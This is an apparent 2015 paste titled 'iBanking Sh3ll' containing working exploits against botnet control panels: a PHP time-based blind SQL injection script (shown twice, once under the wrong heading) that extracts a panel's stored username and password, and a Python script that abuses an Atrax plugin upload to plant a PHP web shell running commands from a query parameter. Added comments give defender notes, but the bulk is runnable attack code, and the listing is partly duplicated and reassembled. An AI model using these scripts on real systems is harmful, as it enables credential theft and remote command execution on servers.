
iBanking Sh3ll - HoC Article

a guest
Jan 23rd, 2015
  1. shell: <?php
  2. // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
  3. // Start with PHP CLI (php pwn.php)
  // No execution time limit: the delay-based probing below takes seconds per request.
  set_time_limit(0);

  // Tunables, values exactly as in the listing:
  //   SLEEP_TIME - seconds handed to SQL SLEEP() inside every probe
  //   PAGE_TIME  - elapsed-seconds threshold is_true() treats as "the reply was delayed"
  //   URL        - base URL of the panel (points at localhost in the listing)
  const SLEEP_TIME = '4';
  const PAGE_TIME = 4;
  const URL = 'http://localhost/Phase/';

  echo 'attacking ' . URL . PHP_EOL;

  // Read two rows of the `settings` table; the recovered values are only echoed.
  get_string('username');
  get_string('password');
  15.  
  /**
   * Work out how long the `value` stored under $field in `settings` is,
   * using response delay as the only signal.
   *
   * Each probe makes the database call SLEEP(SLEEP_TIME) only when
   * LENGTH(value) equals the candidate; is_true() reports whether the reply
   * was slow. Candidates start at 1 and grow without an upper bound.
   *
   * Defender's reading: every probe is a separate gate.php request whose `i`
   * parameter carries a quote, UNION SELECT and SLEEP(, so the activity is
   * conspicuous in access logs, and it stops working once that parameter is
   * bound instead of concatenated into SQL.
   * NOTE(review): gate.php is not shown; the concatenation is inferred from
   * the probe shape.
   *
   * @param string $field key of the `settings` row
   * @return int length that produced a delayed reply
   */
  function get_length($field) {
      $candidate = 1;

      for (;;) {
          $probe = "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $candidate . ") OR SLEEP(" . SLEEP_TIME . "))-- ";
          if (is_true($probe)) {
              break;
          }
          ++$candidate;
      }

      echo($field . ' length: ' . $candidate . PHP_EOL);

      return $candidate;
  }
  27.  
  /**
   * Recover the whole `value` for $field one byte at a time.
   *
   * Asks get_length() for the length, then get_char() for each position, and
   * echoes the partial result padded with '*' after every byte.
   *
   * @param string $field key of the `settings` row
   * @return string the recovered value
   */
  function get_string($field) {
      $total = get_length($field);
      $recovered = '';
      $pos = 0;

      while ($pos < $total) {
          $recovered .= chr(get_char($field, $pos));
          echo($field . ' : ' . str_pad($recovered, $total, '*') . PHP_EOL);
          ++$pos;
      }

      return $recovered;
  }
  39.  
  /**
   * Recover one byte of the `value` column, bit by bit.
   *
   * Masks 1, 2, 4 ... 64 are each tested with one timed probe: the database
   * sleeps only when the masked bit of ORD(SUBSTR(value, pos, 1)) is set.
   * The 128 bit is never probed and is fixed to 0, so the result is always
   * in the 7-bit range.
   *
   * @param string $field key of the `settings` row
   * @param int    $id    zero-based offset (SUBSTR is 1-based, hence the +1)
   * @return int byte value assembled from the probed bits
   */
  function get_char($field, $id) {
      $bits = '';

      for ($mask = 1; $mask < 256; $mask *= 2) {
          if ($mask === 128) {
              $bit = '0';
          } else {
              $probe = "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $mask . ") OR SLEEP(" . SLEEP_TIME . "))-- ";
              $bit = is_true($probe) ? '1' : '0';
          }

          // Higher masks are visited later, so each new bit goes on the left.
          $bits = $bit . $bits;
      }

      return bindec($bits);
  }
  52.  
  /**
   * Send one probe to gate.php and classify it by elapsed time.
   *
   * The POST body is a fixed form string, RC4-encrypted with a four-byte key
   * that is prepended to the ciphertext in the clear. The probe itself is
   * URL-encoded and appended directly after the `i=127.0.0.1` query value.
   *
   * Defender's reading: the injection point is the `i` query parameter.
   * Panel-side, validating it as an IP address (e.g. filter_var() with
   * FILTER_VALIDATE_IP) and using prepared statements closes it; in logs,
   * look for gate.php requests whose `i` value is longer than an address.
   *
   * @param string $query SQL fragment to append to the `i` parameter
   * @return bool true when the round trip took at least PAGE_TIME seconds
   */
  function is_true($query) {
      $rc4_key = 'aaaa'; // body fields: b d u
      $data = 'u=tapz&d=faggot&b=lol';
      $body = $rc4_key . rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
      $target = URL . 'gate.php?i=127.0.0.1' . urlencode($query);
      $req = post_request($target, $body);

      return $req['time'] >= PAGE_TIME;
  }
  63.  
  /**
   * POST $data to $url with cURL and time the round trip.
   *
   * The request uses a fixed desktop-Chrome User-Agent and a 30 second
   * timeout; response headers are not included in the returned body.
   *
   * @param string $url  full request URL
   * @param string $data raw POST body
   * @return array 'page' => whatever curl_exec() returned,
   *               'time' => elapsed wall-clock seconds as a float
   */
  function post_request($url, $data) {
      $handle = curl_init($url);

      curl_setopt_array($handle, array(
          CURLOPT_HEADER => false,
          CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
          CURLOPT_RETURNTRANSFER => true,
          CURLOPT_POST => true,
          CURLOPT_POSTFIELDS => $data,
          CURLOPT_TIMEOUT => 30,
      ));

      // Only the transfer itself is timed; handle setup and teardown are outside.
      $started = microtime(true);
      $page = curl_exec($handle);
      $elapsed = microtime(true) - $started;

      curl_close($handle);

      return array('page' => $page, 'time' => $elapsed);
  }
  85.  
  /**
   * Plain RC4: key scheduling followed by keystream XOR.
   *
   * RC4 is symmetric, so the same call encrypts and decrypts. In this script
   * the caller sends the key in the clear in front of the ciphertext, so the
   * cipher provides obfuscation of the body, not confidentiality.
   *
   * @param string $pwd         key bytes
   * @param string $data        input bytes
   * @param int    $data_length number of bytes of $data to process
   * @param int    $pwd_length  number of key bytes to cycle through
   * @return string output bytes, $data_length long
   */
  function rc4($pwd, $data, $data_length, $pwd_length){
      // State starts as the identity permutation 0..255.
      $box = range(0, 255);
      $key = array();
      for ($i = 0; $i < 256; $i++) {
          $key[$i] = ord($pwd[$i % $pwd_length]);
      }

      // Key scheduling: shuffle the state under control of the repeated key.
      $j = 0;
      for ($i = 0; $i < 256; $i++) {
          $j = ($j + $box[$i] + $key[$i]) % 256;
          list($box[$i], $box[$j]) = array($box[$j], $box[$i]);
      }

      // Keystream generation, XORed onto the input one byte at a time.
      $out = '';
      $a = 0;
      $j = 0;
      for ($n = 0; $n < $data_length; $n++) {
          $a = ($a + 1) % 256;
          $j = ($j + $box[$a]) % 256;
          list($box[$a], $box[$j]) = array($box[$j], $box[$a]);
          $out .= chr(ord($data[$n]) ^ $box[($box[$a] + $box[$j]) % 256]);
      }

      return $out;
  }
  115.  
  116. creds to: Xytilol
  117.  
  118. Atrax botnet
  119. ==============
  120.  
  121. Type: Shell Upload
  122.  
  123. Shell: #!/usr/bin/python
  124.  
  125. import random
  126. import string
  127. import base64
  128. import urllib
  129. import urllib2
  130.  
  # --- Per-run settings (values exactly as in the listing) ---
  # `payload` is the file content sent by the final upload step: a one-line PHP
  # page that hands its `c` query parameter to system(). Any web-reachable
  # directory that stores this under a .php name gives command execution, which
  # is why an upload handler must not write client-named files to an executable path.
  # `url` is the panel base URL (localhost in the listing).
  payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
  url = 'http://localhost/atrax/'

  # --- Request vocabulary the script uses against auth.php ---
  # Useful to a defender as the parameter names to look for in panel logs.
  GET_PARAM_MODE = 'a'        # query parameter that selects the mode
  BOT_MODE_INSERT = 'b'       # mode value used by createVictim()
  BOT_MODE_RUNPLUGIN = 'e'    # mode value used by exploit()

  # POST field names
  POST_PARAM_GUID = 'h'
  POST_PARAM_IP = 'i'
  POST_PARAM_BUILDID = 'j'
  POST_PARAM_PC = 'k'
  POST_PARAM_OS = 'l'
  POST_PARAM_ADMIN = 'm'
  POST_PARAM_CPU = 'n'
  POST_PARAM_GPU = 'o'
  POST_PARAM_PLUGINNAME = 'q'
  148.  
  def request(url, get, post):
      """Send one HTTP request and return the response body.

      `get` is a ready-made query string ('' for none). `post` is an
      '&'-separated list of key=value pairs that is split into a dict and
      re-encoded with urllib.urlencode before sending. A body is always passed
      to urllib2.Request, even when `post` is ''.

      NOTE(review): the listing lost its indentation; the nesting here (the
      re-encoding runs whether or not `post` is empty) is the reading that
      keeps every call in the script working - confirm against the raw paste.
      """
      target = url if get == '' else url + '?' + get

      fields = {}
      if post != '':
          for pair in post.split('&'):
              parts = pair.split('=')
              fields[parts[0]] = parts[1]

      body = urllib.urlencode(fields)
      response = urllib2.urlopen(urllib2.Request(target, body))
      return response.read()
  162.  
  def queryValue(key, value, next=True):
      """Format one key=value pair, followed by '&' unless `next` is false."""
      pair = key + '=' + value
      return pair + '&' if next else pair
  168.  
  def randomString(length = 8):
      """Return `length` characters drawn from lowercase ASCII letters and digits.

      Uses the `random` module, which is not a cryptographic generator.
      """
      alphabet = string.ascii_lowercase + string.digits
      picked = []
      for _ in range(length):
          picked.append(random.choice(alphabet))
      return ''.join(picked)
  171.  
  def createVictim(url, guid, ip):
      """Register a bot record with the panel and return the raw response.

      Sends an insert-mode request to auth.php with the given GUID and IP,
      random strings for build id, PC, OS, CPU and GPU, and 'yes' for the
      admin field. The driver below treats a reply of 'STOP' as a refusal.

      Defender's reading: nothing in this request is a secret - the fields are
      a GUID, an IP and descriptive strings - so, as far as the listing shows,
      the panel accepts registrations from any client that knows the
      parameter names.
      """
      get = GET_PARAM_MODE + '=' + BOT_MODE_INSERT
      fields = [
          (POST_PARAM_GUID, guid),
          (POST_PARAM_IP, ip),
          (POST_PARAM_BUILDID, randomString()),
          (POST_PARAM_PC, randomString()),
          (POST_PARAM_OS, randomString()),
          (POST_PARAM_ADMIN, 'yes'),
          (POST_PARAM_CPU, randomString()),
          (POST_PARAM_GPU, randomString()),
      ]
      post = '&'.join(name + '=' + value for name, value in fields)
      return request(url + 'auth.php', get, post)
  183.  
  def exploit(url, guid, ip, file, payload):
      """Send one run-plugin request to auth.php for the 'atraxstealer' plugin.

      The request carries the bot GUID and IP plus four plugin fields:
      'am' (a random string), 'ad' (`file`), 'ab' (`payload`, base64-encoded)
      and 'ai' ('18'). The response is discarded.

      Defender's reading: testExploit() later fetches `file` from
      plugins/atraxstealer/wallet/, so the plugin presumably writes the decoded
      'ab' content under the client-supplied 'ad' name inside the web root
      (the plugin code is not shown). The fixes are the usual ones for an
      upload handler: generate the stored name server-side, restrict the
      extension, and keep the directory non-executable or outside the web root.
      """
      get = GET_PARAM_MODE + '=' + BOT_MODE_RUNPLUGIN
      fields = [
          (POST_PARAM_PLUGINNAME, 'atraxstealer'),
          (POST_PARAM_GUID, guid),
          (POST_PARAM_IP, ip),
          ('am', randomString()),
          ('ad', file),
          ('ab', base64.b64encode(payload)),
          ('ai', '18'),
      ]
      post = '&'.join(name + '=' + value for name, value in fields)
      request(url + 'auth.php', get, post)
  194.  
  def testExploit(url, guid, ip):
      """Check whether the panel stores and executes an uploaded .php file.

      Uploads a marker page that only echoes '1337' under a random name, then
      requests it from plugins/atraxstealer/wallet/. Returns True when the
      stripped response is exactly '1337', i.e. the file was written there and
      the web server ran it as PHP.
      """
      marker_name = randomString() + '.php'
      marker_page = '<?php echo("1337"); ?>'
      exploit(url, guid, ip, marker_name, marker_page)
      fetched = request(url + 'plugins/atraxstealer/wallet/' + marker_name, '', '')
      return fetched.strip() == '1337'
  200.  
  # Driver: register a bot record, confirm with the marker page that uploads are
  # stored and executed, then upload the configured payload and print its URL.
  # NOTE(review): the listing lost its indentation; the branch nesting below is
  # inferred from the messages - confirm against the raw paste.
  guid = '7461707a7461707a7461707a7461707a'
  ip = '91.224.13.103'
  file = randomString() + '.php'

  if createVictim(url, guid, ip).strip() != 'STOP':
      print '[~] Victim created/updated...'
      if not testExploit(url, guid, ip):
          print '[-] Cannot upload payload, maybe the plugin is not actived?'
      else:
          exploit(url, guid, ip, file, payload)
          print '[+] Exploit uploaded!'
          print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
  else:
      print '[-] Cannot create victim...'
  214.  
  215.  
  216. Phase botnet
  217. ===============
  218.  
  219. Type: blind SQLi
  220.  
  221. Vuln: <?php
  222. // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
  223. // Start with PHP CLI (php pwn.php)
  // No execution time limit: the delay-based probing below takes seconds per request.
  set_time_limit(0);

  // Tunables, values exactly as in the listing:
  //   SLEEP_TIME - seconds handed to SQL SLEEP() inside every probe
  //   PAGE_TIME  - elapsed-seconds threshold is_true() treats as "the reply was delayed"
  //   URL        - base URL of the panel (points at localhost in the listing)
  const SLEEP_TIME = '4';
  const PAGE_TIME = 4;
  const URL = 'http://localhost/Phase/';

  echo 'attacking ' . URL . PHP_EOL;

  // Read two rows of the `settings` table; the recovered values are only echoed.
  get_string('username');
  get_string('password');
  235.  
  /**
   * Work out how long the `value` stored under $field in `settings` is,
   * using response delay as the only signal.
   *
   * Each probe makes the database call SLEEP(SLEEP_TIME) only when
   * LENGTH(value) equals the candidate; is_true() reports whether the reply
   * was slow. Candidates start at 1 and grow without an upper bound.
   *
   * Defender's reading: every probe is a separate gate.php request whose `i`
   * parameter carries a quote, UNION SELECT and SLEEP(, so the activity is
   * conspicuous in access logs, and it stops working once that parameter is
   * bound instead of concatenated into SQL.
   * NOTE(review): gate.php is not shown; the concatenation is inferred from
   * the probe shape.
   *
   * @param string $field key of the `settings` row
   * @return int length that produced a delayed reply
   */
  function get_length($field) {
      $candidate = 1;

      for (;;) {
          $probe = "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $candidate . ") OR SLEEP(" . SLEEP_TIME . "))-- ";
          if (is_true($probe)) {
              break;
          }
          ++$candidate;
      }

      echo($field . ' length: ' . $candidate . PHP_EOL);

      return $candidate;
  }
  247.  
  /**
   * Recover the whole `value` for $field one byte at a time.
   *
   * Asks get_length() for the length, then get_char() for each position, and
   * echoes the partial result padded with '*' after every byte.
   *
   * @param string $field key of the `settings` row
   * @return string the recovered value
   */
  function get_string($field) {
      $total = get_length($field);
      $recovered = '';
      $pos = 0;

      while ($pos < $total) {
          $recovered .= chr(get_char($field, $pos));
          echo($field . ' : ' . str_pad($recovered, $total, '*') . PHP_EOL);
          ++$pos;
      }

      return $recovered;
  }
  259.  
  /**
   * Recover one byte of the `value` column, bit by bit.
   *
   * Masks 1, 2, 4 ... 64 are each tested with one timed probe: the database
   * sleeps only when the masked bit of ORD(SUBSTR(value, pos, 1)) is set.
   * The 128 bit is never probed and is fixed to 0, so the result is always
   * in the 7-bit range.
   *
   * @param string $field key of the `settings` row
   * @param int    $id    zero-based offset (SUBSTR is 1-based, hence the +1)
   * @return int byte value assembled from the probed bits
   */
  function get_char($field, $id) {
      $bits = '';

      for ($mask = 1; $mask < 256; $mask *= 2) {
          if ($mask === 128) {
              $bit = '0';
          } else {
              $probe = "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $mask . ") OR SLEEP(" . SLEEP_TIME . "))-- ";
              $bit = is_true($probe) ? '1' : '0';
          }

          // Higher masks are visited later, so each new bit goes on the left.
          $bits = $bit . $bits;
      }

      return bindec($bits);
  }
  272.  
  /**
   * Send one probe to gate.php and classify it by elapsed time.
   *
   * The POST body is a fixed form string, RC4-encrypted with a four-byte key
   * that is prepended to the ciphertext in the clear. The probe itself is
   * URL-encoded and appended directly after the `i=127.0.0.1` query value.
   *
   * Defender's reading: the injection point is the `i` query parameter.
   * Panel-side, validating it as an IP address (e.g. filter_var() with
   * FILTER_VALIDATE_IP) and using prepared statements closes it; in logs,
   * look for gate.php requests whose `i` value is longer than an address.
   *
   * @param string $query SQL fragment to append to the `i` parameter
   * @return bool true when the round trip took at least PAGE_TIME seconds
   */
  function is_true($query) {
      $rc4_key = 'aaaa'; // body fields: b d u
      $data = 'u=tapz&d=faggot&b=lol';
      $body = $rc4_key . rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
      $target = URL . 'gate.php?i=127.0.0.1' . urlencode($query);
      $req = post_request($target, $body);

      return $req['time'] >= PAGE_TIME;
  }
  283.  
  /**
   * POST $data to $url with cURL and time the round trip.
   *
   * The request uses a fixed desktop-Chrome User-Agent and a 30 second
   * timeout; response headers are not included in the returned body.
   *
   * @param string $url  full request URL
   * @param string $data raw POST body
   * @return array 'page' => whatever curl_exec() returned,
   *               'time' => elapsed wall-clock seconds as a float
   */
  function post_request($url, $data) {
      $handle = curl_init($url);

      curl_setopt_array($handle, array(
          CURLOPT_HEADER => false,
          CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
          CURLOPT_RETURNTRANSFER => true,
          CURLOPT_POST => true,
          CURLOPT_POSTFIELDS => $data,
          CURLOPT_TIMEOUT => 30,
      ));

      // Only the transfer itself is timed; handle setup and teardown are outside.
      $started = microtime(true);
      $page = curl_exec($handle);
      $elapsed = microtime(true) - $started;

      curl_close($handle);

      return array('page' => $page, 'time' => $elapsed);
  }
  305.  
  /**
   * Plain RC4: key scheduling followed by keystream XOR.
   *
   * RC4 is symmetric, so the same call encrypts and decrypts. In this script
   * the caller sends the key in the clear in front of the ciphertext, so the
   * cipher provides obfuscation of the body, not confidentiality.
   *
   * @param string $pwd         key bytes
   * @param string $data        input bytes
   * @param int    $data_length number of bytes of $data to process
   * @param int    $pwd_length  number of key bytes to cycle through
   * @return string output bytes, $data_length long
   */
  function rc4($pwd, $data, $data_length, $pwd_length){
      // State starts as the identity permutation 0..255.
      $box = range(0, 255);
      $key = array();
      for ($i = 0; $i < 256; $i++) {
          $key[$i] = ord($pwd[$i % $pwd_length]);
      }

      // Key scheduling: shuffle the state under control of the repeated key.
      $j = 0;
      for ($i = 0; $i < 256; $i++) {
          $j = ($j + $box[$i] + $key[$i]) % 256;
          list($box[$i], $box[$j]) = array($box[$j], $box[$i]);
      }

      // Keystream generation, XORed onto the input one byte at a time.
      $out = '';
      $a = 0;
      $j = 0;
      for ($n = 0; $n < $data_length; $n++) {
          $a = ($a + 1) % 256;
          $j = ($j + $box[$a]) % 256;
          list($box[$a], $box[$j]) = array($box[$j], $box[$a]);
          $out .= chr(ord($data[$n]) ^ $box[($box[$a] + $box[$j]) % 256]);
      }

      return $out;
  }